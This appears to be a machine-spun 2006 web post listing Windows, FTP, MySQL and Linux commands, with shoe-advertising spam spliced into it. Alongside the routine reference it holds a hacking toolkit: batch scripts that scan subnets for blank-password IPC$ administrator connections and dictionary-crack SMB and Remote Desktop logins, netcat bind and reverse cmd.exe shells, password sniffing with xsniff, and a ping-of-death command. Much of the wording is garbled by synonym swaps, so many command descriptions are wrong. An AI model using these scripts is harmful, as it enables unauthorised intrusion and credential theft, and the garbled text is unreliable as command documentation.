2006-11-03
DOS command Daquan (Classic Collection)
net use ip ipc $ h: ip c $ locally H:
net use ip ipc $ / del to delete IPC interlock
net use h: / del to delete the charting for the other to the local H: charting
net user username password / join create a user
net user guest / active: yes lively users
net user guest to see what users
net user list name to view the account properties
net localgroup administrators username / add to the director to have administrator prerogatives,
Lacoste UK, disburse attention: administrator, add s in the plural
net start outlook on what services
net start service name on services; (such as: net start telnet, net start schedule)
net stop service name to stop a service
net time target ip see each other time
net time target ip / set the local computer time and set the / yes cancel confirmation
net view view on the local LAN which shared
net view ip see each other on the LAN which shared
net config display system off the web settings
net logoff open linkage sharing
net pause service names halt a service
net send ip open sharing
net share ipc $ on ipc $ share
net share ipc $ / del to delete ipc $ share
net share c $ / del to erase C: shared
net user visitor 12345 with a visitor user After landing with a password to 12345
net password password change the system login password
netstat-a view which ports are opened, used netstat-an
netstat-n to view the network connection port, common netstat - one
netstat-v view an ongoing work
netstat-p protocol in cases of: netstat-p tcq / ip view the use of a protocol (see tcp / ip protocol usage)
netstat-s view is the use of all protocols used
nbtstat-A ip one of the other ports 136-139 open, then you can see each other last login user name (ahead the user name 03) - Note: The parameter-A to uppercase
tracert - parameter ip (or computer name) to trace routing (packet), parameters:
ping ip (or domain) to the other host to send the default size of 32 bytes of file, parameters: ping.
ping-t-l 65550 ip decease ping (mail a file larger than 64K and has became a ping of death ping)
ipconfig (winipcfg) for windows NT and XP (windows 95 98) watch the local ip address, ipconfig obtainable parameters
kill-F-F process parameters were additional to force the end of a process (an increased tool for the system, the default is not installed in the installation directory of Support / tools folder)
del-F file name plus -F parameter can delete read-only file, / AR, / AH, / AS, / AA, respectively, remove the read-only, invisible, system, archive file, / AR, / AH, / AS, / AA said namely in increase to just delete read, hidden, system, archive files appearance. For instance, br>
del / S / Q catalog or use: rmdir / s / Q catalog / S delete the directory and all subdirectories under the directory and files. At the same time using the parameter / Q to cancel the delete action of the system confirm the straight deletion. (Two commands the same effect)
move letter path file name you want to move move the file storage path file name after the move to move files, use the parameter / y will obliterate move confirm the subsistence of the same file directory tips directly cover
fc one.txt two.txt> 3st.txt two files and liken the inconsistency output to 3st.txt file, > at id has been registered on a number of scheduled tasks
at / delete to stop all scheduled tasks, with the parameters / yeah you do not need to confirm the direct number to stop
at id / delete to stop the task of a registered contrive
at all the scheduled tasks
at ip time the program name (or command) / r at a certain time to run other programs and restart the computer
finger username @ host to view which users have recently landed
telnet ip port remote and login server, the default port 23
open ip to connect to the IP (after landing is a telnet command)
telnet directly aboard the machine type telnet to access the machine telnet
copy path file name a path filename 2 / y 1 file copied to the specified directory as a file 2, with parameters / y to validation the cancellation of the directory you want to overwrite an existing file
copy c: srv.exe ip admin $ copy local c: srv.exe to each other admin under
cppy 1st.jpg / b +2 st.txt / a 3st.jpg to conceal the contents of the 2st.txt generated 1st.jpg 3st.jpg new file, Note: 2st.txt header to blank three rows, arguments: / b refers to the binary file, / a means ASCLL format
duplicate ip admin $ svv.exe c: or: copy ip admin $ *.* copy each other admini $ Sharing in srv.exe files (all files) to the local C:
xcopy to copy files or directory tree destination directory name to copy files and the tree, with parameters / Y will not be prompted to overwrite the same file
tftp-i own IP (when used as a springboard flesh machine meat machine with this IP) get server.exe c: server.exe after landing, the IP
tftp-i other IP put c: server.exe after landing, upload the local c: server.exe to host
ftp ip port for uploading files to a server or for file operations, the default port for the 21. bin refers to the transmission of binary (executable file into); default to send ASCII format (text file)
path publish shows the IP routing, network address to the main display Network addres, subnet disguise, Netmask, Gateway Address Gateway addres, Interface Address Interface
arp view and wield the ARP storage,
Womens Lacoste Trainers, ARP is the meaning of name resolution, is responsible for an IP determinations a physical MAC address. arp-a will show all the information
start the procedure name or command / max or / min to open a new skylight and maximize (minimize) run a procedure or command
mem check cpu usage
attrib file name (directory name) to view a file (directory) attribute
attrib filename-A-R-S-H or + A + R + S + H to remove (add) a file archive, read-only, system, hidden attributes; with + is added as an property
dir view the file, parameters: / Q display file and directory is the system which the user, / T: C display the file creatiin due time,
Womens Lacoste, / T: A display file last is access time, / T: W Last modified time
date / t, time / t using this parameter is specified date and time
set the environment variable name = to be assigned to the variable character set environment variables
set displays all current environment variables
set p (or other characters) to display the current symbol p (or other role) at the starting of all the environmental variables
standstill pause batch program and displays: Press any opener to proceed ....
if the conditions in a batch program execution processing (more explanation see if the command and variable )
goto name cmd.exe batch program directed to the line with a label (label must be a separate line, and starts with a colon, for instance: batch program to phone variant batch program (for more explanation see call /?)
for a group of files in each file to execute a specific command (see further instructions for command and variable)
echo on or off to open or close the echo, just echo without parameters to display the current echo setting
echo information is displayed on the screen information
echo information>> pass.txt the . txt file
findstr Set cmd console foreground and background color; 0 = dark, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple 6 = yellow 7 = white 8 = gray 9 = light blue , A = light green, B = sallow light green, C = light red, D = purple, E = yellow, F = pearly
prompt change the name of the display of the command prompt cmd.exe (the C: , D: unified to: EntSky )
# 3 three:
ver in a DOS window displays version information
winver a pop-up window displays version information (memory size, system version,
Lacoste Strap Trainers, patch version, computer name)
format letter / FS: type of format the disk, type: FAT, FAT32, NTFS, example: Format D: / FS: NTFS
md directory name to create the directory
replace the source files to replace files replace the files
ren native file name new file name to rename the file name
tree to display directory tree structure, with the argument-f will list the first name of the file folders
type the file name display the contents of txt files by file name
more screen display output file to be locked
doskey character
doskey command = command to unlock the bolt provided for DOS = command (Edit command line, recollect win2k command, and create a macro). Such as: Lock dir command: doskey dir = entsky (can not use doskey dir = dir); unlock: doskey dir =
taskmgr send up the Task Manager
chkdsk / FD: Check the disk D and displays a status report; plus parameter / f and repair errors on the disk
tlntadmn telnt service admn, type tlntadmn prefer 3, then choose 8, you tin change the default port 23 telnet service to anyone other port
exit to exit the cmd.exe program or present, with the parameter / B is out of the current batch script instead of cmd.exe
path path executable file called an executable file to set up a path.
cmd shell window to start a win2K. Parameters: / eff, / en off, open a command expansion; more elaborate I see cmd /?
Regedit / s Registry file name into the registry; parameters / S refers to the import in quiet mode, without any prompts;
regedit / e Export registry file name registry
cacls filename parameter to display or modify file access control list (ACL) - for the NTFS format. Parameters: / D user: set veto a user access; / P user: perm Replace specified user's access rights; / G user: perm give the specified user access rights; Perm can be: N None, R read W Write, C Change (write), F Full Control; example: cacls D: test.txt / D pub set d: test.txt renounce users access to tavern.
cacls filename to view the file access permissions list
REM user text in the batch file, add annotations
netsh view or change the local network configuration
# 4 four:
IIS service command:
iisreset / reboot reboot the win2k machine (but remind the system will reboot information appears)
iisreset / start or stop start (stop) all Internet service
iisreset / restart to stop and re- Start all Internet services
iisreset / status displays the status of all Internet service
iisreset / qualify or disable the local system to enable (disable) Internet service restart
iisreset / rebootonerror When you start, stop or restart Internet service, if the error happened will restart
iisreset / noforce If you can not stop the Internet service will not be forced to terminate Internet service
iisreset / timeout Val over at the appearance time (seconds), it has not stopped Internet services, If you clarify / rebootonerror parameter, the calculator will reboot. The default is to restart 20 seconds, stop for 60 seconds to reboot 0 seconds.
FTP command: (emulated by a detailed specification of content)
ftp command line format is:
ftp-v-d-i-n-g [hostname]-v displays all remote server answer information .
-d Use debugging mode.
-n restrict ftp auto login, which does not use. netrc file.
-g to cancel the global file name.
help [command] or? [Command] See note
bye or quit command to terminate the host FTP process and exit the FTP management.
Pwd lists the current remote host directory
put or send a local file name [uploaded to the host file name] will send a local file to the remote host
obtain or recv [remote host file name] [file later download to a regional name] from the remote host sent to the local host
mget [remote -files] a number of documents received from the remote host to local host
mput local-files in a number of local hosts file to the remote host
dir or ls [remote-directory] [local-file] col the current remote host files in the directory if there is a local file, the result will be written to the local file
ascii set mode to transmit files in ASCII (default)
bin or transmitted in binary image set File
alarm once for each completed file transfer, alarm
cdup return to the before directory
close interrupt the ftp session with the remote server (and open the corresponding)
open host [port] ftp server to create the specified connection, you can specify port
delete delete remote host file
mdelete [remote-files] Delete a group of files
mkdir directory-name to create a directory on the remote host
rename [from ] [to] change the file name of the remote host
rmdir directory-name Delete the remote host in the FTP directory
status shows the current status of
system displays the remote host system type
user user -name [password] [account] user name to log on again to another remote host
open host [port] to re-establish a current connection
prompt interactive prompt mode
macdef defined macros
lcd change the current working directory of the local host, if you default, they go to the current user's HOME directory
chmod change file permissions on the remote host
case when ON, with the MGET command copies the file name to the local machine in all lowercase letters
cd remote-dir into the remote host directory
cdup into the remote host directory's parent
! in the local machine to act interactive shell, exit back to the ftp context, such as! ls *. zip
# 5 five:
MYSQL command:
mysql-h host address-u username-p password to connect MYSQL; If you have just installed MYSQL, super-user root is no password.
(Example: mysql-h110.110.110.110-Uroot-P123456
Note: u and the basis can not add space, the other is the same)
exit exit MYSQL
mysqladmin-u username - p password new password the old password to change the password
grant select on database .* to username @ log host identified by (Note: the above is another because it is MYSQL following command in the environment, so the back with a semicolon as a command terminator)
show databases; display the database list. At first only two databases: mysql and test. mysql database MYSQL inside it is very important system information, we change the password and add users really use this library to manipulate.
use mysql;
show tables; shows library tables
describe table; display the data table structure
build database database label; building a database
use library name;
create table chart name (field set catalogue); built table
drop database database name;
drip table table name; delete and delete database tables
delete from table name; the record table cleared
select * from table name; display records in the table
mysqldump - opt school> school.bbb export database: (command in DOS mysql bin directory, execute); Note: The database backup school to school.bbb file, school.bbb is a text file, the file name both take, open look you have new discoveries.
win2003 system under the new command (practical chapter):
shutdown / corner off or restart a local or parameters of the remote host.
Parameters: / S off the host, / R to restart the host, / T digital set tarry time range from 0 to 180 seconds, / A cancellation shoe, / M / / IP specified remote host.
Example: shutdown / r / t 0 instantly restart the local host (no delay)
taskill / parameters of the process name or pid of the process to terminate one or more missions and processes.
Parameters: / PID to terminate the process pid, the tasklist command can be secondhand to win the process pid, / IM process to terminate the process name, / F compelled to terminate the process, / T to terminate the process specified by the start of the baby and his process.
tasklist shows currently running on the local and remote host process, service, service of process, process identifier (PID).
Parameters: / M lists the current process to load the dll file, / SVC showing each process corresponding to the service and parameter list only when the current process.
# 6 six:
Linux system elementary commands: case-sensitive
uname display edition information (with win2K's ver)
dir displays the current directory files, ls - al show, including hidden files (with win2K the dir)
pwd query the current position of the directory where
cd cd .. back to the parent directory, note the space among cd and ... cd / to return to the root directory.
feline file name to view file contents
cat> abc.txt abc.txt file to write the content.
more file names to a page displays a text file.
cp copy files
mv move files
rm file name to delete the file, rm-a directory name to delete the directory and subdirectories
mkdir directory name to create the directory
rmdir clear directory, the catalogue does no document.
chmod to set file or directory access permissions
grep quest string in the file archive
diff compare
find file search
date the current date, period
who query present and you use the same machine as well as time and place
w queries Login is currently on the machine's details
whoami to see your account name
groups view someone's Group
passwd change password
history check under his command had
ps display process status
annihilate to stop a process
gcc hackers often use it to compile the C language to write the file permissions
su converted to the specified user
telnet IP telnet to connect the other host (with win2K), when there is bash $ when the connection is successful.
ftp ftp connection on a waiter (with win2K)
attached: Batch command and variable
1: for command and variable basic format:
FOR / parameter% variable IN (set) DO command [command_parameters]% variable: Specify a single letter exchangeable parameter, such as:% i, and ascribe a variable is used:%% i, and call the variables used:% i%, variables are case-sensitive write (% i is not equal to% I).
each batch can handle variable from% 0 -% 9 of 10, where% 0 default batch file name to use,% default to using this batch of the first input value, empathy :% 2 -% 9 refers to the input of the first 2-9 values; example: net use ip ipc $ pass / user: user in the ip is% 1,
Lacoste Observe Strap Trainers, pass to% 2, user is% 3
(set): specifies a file or a group, you can use wildcards, such as: (D: user.txt) and (11254) (1-1254), The first to 1
command: execute the specified files on the first command, such as: net use command; To execute multiple commands, command this add: & to separate
command_parameters: to specify a specific command parameters or command line alternate
IN (set): refers to the (set) in value; DO command: refers to the execution command
parameters: / L refers to the incremental form (set) when the increments in the form; / F refers to values from the file constantly, until the end to come from (set) of files, such as (d: pass.txt) at.
Example usage:
@ echo off
echo method format: test.bat *.*.*> test.txt
for / L%% G in (1 1 254) do echo% 1.%% G>> test.txt & net use % 1.%% G / user: administrator | find test.bat Description: The specified segment of a Class C IP 254 in order to build the test administrator password is blank IPC $ connection, if successful, put test.txt exists in the IP.
/ L refers to the incremental manner (ie, from 1-254 or 254-1); enter the IP for the before 3 :*.*.* batch default% 1;%% G for the variable (ip of the last one); & echo and net use to separate these two mandates; | refers to the establishment of the ipc $, in the results using find to see whether the % G for the full IP address; (11254) refers to the starting value, an boost of volume, end ending value.
@ echo off
echo usage format: ok.bat ip
FOR / F%% i IN (D: user.dic) DO smb.exe% 1%% i D: pass.dic 200
save: ok.exe Description: Enter an IP, the dictionary file d: pass.dic to turbulent solutions d: consumer.dic a user password, the file it is taken until the final. %% I because the user name;% 1 for the input of the IP address (default).
# 7 seven:
2: if the basic format of the command and variable:
IF [not] errorlevel number command to run the last return statement if the program is equal to or greater than a specified number of exit encoding, the specified condition is
Example: IF errorlevel 0 manner the program execution command returns a value of 0, the value of the line behind the command; IF not errorlevel 1 Command refers to the terminal execution the return value is not equal to 1, on the implementation of the next command.
0 refers to the discovery and successful implementation of the (true); 1 means not ascertained, did not execute (artificial).
IF [not] string1 == string2 command statement matches if the specified text string (ie: String 1 is equal to string 2), on the implementation of the next command.
example:
example:
IF [not] errorlevel number command command expression another statement or IF [not] string1 == string2 command statement else statement or command IF [not] exist filename command else command statement, the statement added: else command statement means: the current surface condition does not hold, it refers to the command line else behind. Note: else must be efficacious if the same line. When the del command is required to use the plenary contents of the del command brackets, because the del command to execute only when a separate line, and use after the other so a single line; case in point: txt. else echo test.txt.lacking Saber: nc.exe
Parameters:
-h View help
-d background mode
-e prog program to redirect a connection but on the implementation of [perilous]
-i secs delay interval
-l listen mode, for inbound connections
-L listen mode, the connection to continue even after days of near monitoring until the CTR + C
-n IP address, can not be used Domain
-o film records the transmission of hexadecimal
-p [space] port local port number
-r irregular local and remote ports
-t use the Telnet interactive
-u UDP mode
-v verbose output, use-vv diagrams in more detail
-w timeout delay interval
-z input, output off (when the anchor for the sweep)
basic usage:
nc-nvv 192.168.0.1 80 to join to host 192.168.0.1 port 80
nc-l-p 80 on the machine's TCP 80 port and listen
nc-nvv-w2-z 192.168.0.1 80-1024 80-1024 192.168.0.1, port scan anchor
nc-l-p 5354-t-ec: winntsystem32cmd.exe fastening cmdshell remote host's TCP 5354 port at the remote
nc-t-ec : winntsystem32cmd.exe 192.168.0.2 5354 bang cmdshell given remote host and reverse the 5354 port to connect 192.168.0.2
Advanced Usage:
nc-L-p 80 as a honey pot with 1: Open and kept listens on port 80, until the CTR + C until the
nc-L-p 80> c: log.txt as a honey kettle with 2: to open and keep listening on port 80, until the CTR + C, while the resulting output to c: log.txt
nc-L-p 80 redirect command. : winnt>> d: log.txt means: the background dir, and the results exist d: log.txt in
> with>> the difference between ;
such as: @ dir c: winnt>> d: log.text and @ dir c: winnt> d: log.txt execute 2 commands, respectively, the second more apt see: with>> ; the second namely the results are saved, yet with:> merely 1 outcome, for the second result apt the first cover.
# 8 eight:
2, sweep the anchor tool: xscan.exe
basic format
xscan-host [- ] [other adoptions] sweep anchor ,],[br>-port detection of commonly used services of the port state
-ftp FTP test detects languid passwords
-pub unknown users write access to FTP services
-pop3 test POP3-Server weak password
-smtp SMTP-detection Server vulnerability
-sql testing SQL-Server weak password
-smb discover NT-Server weak password
-iis IIS detection encoding / decoding vulnerability
-cgi CGI vulnerability
-nasl test load Nessus Attack Scripting
-all test all of the upon
other options
-i set the network adapter adapter number,
Lacoste Gravitate Trainers, by l shows all the network adapters
-v scan shows detailed progress
-p bounce the host did not answer to skip
-o does not detect open ports on the host
-t the digit of simultaneous threads, simultaneous Specify the maximum number of hosts the number of concurrent threads and concurrent number of hosts, the default number of 100,10
-log file name specifies the scan report file name (suffix: TXT or HTML format)
usage examples
xscan -host 192.168.1.1-192.168.255.255-all-active-p test 192.168.1.1-192.168.255.255 network segment host all the loopholes, skip-free response of the host
xscan-host 192.168.1.1-192.168.255.255 -port-smb-t 150-o test 192.168.1.1-192.168.255.255 criterion subnet host port status, NT weak password, the user, the maximum number of concurrent threads is 150, not detected open ports to skip the host
xscan-file hostlist.txt-port-cgi-t 200,5-v-o test detection of 5 hosts, displays detailed test schedule, skip to the open port does not detect the host
# 9 nine:
3, the command line sniffer: xsniff.exe
LAN FTP/SMTP/POP3/HTTP accord can capture passwords
Parameters
-tcp outbound TCP parcels
-udp junket UDP datagram
-icmp output ICMP packets
-pass password information
-hide filter running in the background
-host to resolve host names
-addr IP address filtering IP address filtering
-port port port
-log file name output to a file
-asc in ASCII output
-hex to hex format output
usage examples
xsniff.exe-pass-hide-log pass.log running in the background sniffing passwords and password information stored in the pass. log file
xsniff.exe-tcp-udp-asc-addr 192.168.1.1 sniffer tcp and udp 192.168.1.1 and filter information in ASCII format output
4, terminus services, password cracking: tscrack . exe
Parameters
-h Displays usage help
-v display version information
-s played on the screen the aptitude to decrypt the password peccadillo
-b sound
-t is the issue with multiple connections (multiple threads)
-N Prevent System Log entries on targeted server
-U uninstall remove tscrack components
-f-f using the password behind
-F interval (frequency)
-l-l using the user name behind
-w-w use the password back the use of a dictionary
-p-p password
-D behind the login main page
usage example
tscrack 192.168.0.1-l administrator-w pass.dic remote password dictionary file with the breaking of the host administrator login password
tscrack 192.168.0.1-l administrator-p 123456 password 123456 using the remote Sign 192.168.0.1 administrator user
@ if it were not for exist ipcscan.txt goto noscan
@ for / f
nscan
@ echo 3389.txt no find or scan faild
(① saved for 3389.bat) (assuming the current sweep with SuperScan anchor or other apparatus to scan a number of open files list of host IP (3389) 3389.txt)
3389.bat means: take a file from 3389.txt IP, and then run hack.bat
@ if I were you exist tscrack.exe goto noscan
@ tscrack% 1-l administrator -w pass.dic>> rouji.txt
: noscan
@ echo tscrack.exe not find or scan faild
(② saved as hack.bat) (run 3389.bat on OKAY, and 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe in the same directory; you can await for the results of a)
cut.cmd means: the breaking run tscrack.exe glossary 3389. txt custodian password on all hosts, and the results cached in rouji.txt crack document.
5, Other:
Shutdown.exe
Shutdown IP Address t: 20 20 seconds after the other NT automatically shut down (Windows 2003 system comes with tools to use under Windows2000 Download this tool to enter you must use in front of Windows 2003 DOS commands are described in detail.)
fpipe.exe (TCP port redirection tool) is described in detail in the second (port redirection to bypass the firewall)
fpipe-l 80-s 1029-r 80 www.sina.com.cn when someone sweep the anchor of your port 80 when he swept to a result completely www.sina.com.cn host information
Fpipe-l 23-s 88-r 23 target IP to the machine to the target IP apply sent by the Telnet port 23 port redirection through the 88 port to a destination IP port 23. (Established with the destination IP on the machine when using Telnet 88 port connected to it) and then: Direct Telnet 127.0.0.1 (local IP) and even received a destination IP port 23.
OpenTelnet.exe (remote open telnet tool)
opentelnet.exe IP account password ntlm authentication Telnet port (no need to upload ntlm.exe undermine Microsoft's authentication method) directly on the other side of the remote telnet service After, you can use telnet ip connection on the other side.
NTLM authentication: 0: do not use NTLM authentication; 1: first attempt NTLM authentication, if that fails, then use the user name and password; 2: to use only NTLM authentication.
ResumeTelnet.exe (OpenTelnet with another tool)
resumetelnet.exe IP account password to use Telnet to connect the other end, you use this command to reinstate the other side of the Telnet settings, and also close the Telnet services.
# 10 ten:
6, FTP Commands Detailed:
FTP command is the maximum prevalent Internet users use one of the commands, versed and amenable application of the inner FTP commands , can greatly facilitate the users, and have a multiplier effect. If you ambition to study how to use FTP to download the backdrop, you have to learn to FTP commands.
FTP command line format is:
ftp-v-d-i-n-g [hostname], which
-v shows all the remote servers response information;
-n limit ftp auto login, which is not used;. n etrc file;
-d Use debugging mode;
-g to cancel the global file name.
FTP using the internal command is as follows (in brackets optional):
1.! [cmd [args]]: the local machine to perform interactive shell, exit back to the ftp environment such as:! ls *. zip
2. $ macro-ame [args]: implementation of the macro meaning of macro-name.
3.account [password]: After the success of the remote system to provide login access to system resources essential to add a password.
4.append local-file [remote-file]: the local file is additional to the remote system host, the remote system is not specified, the file name, then use the local file name.
5.ascii: Use ascii type transfer method.
6.bell: After each command the computer ring once.
DOS directive Daquan ( Classic Collection )
Linear Mode
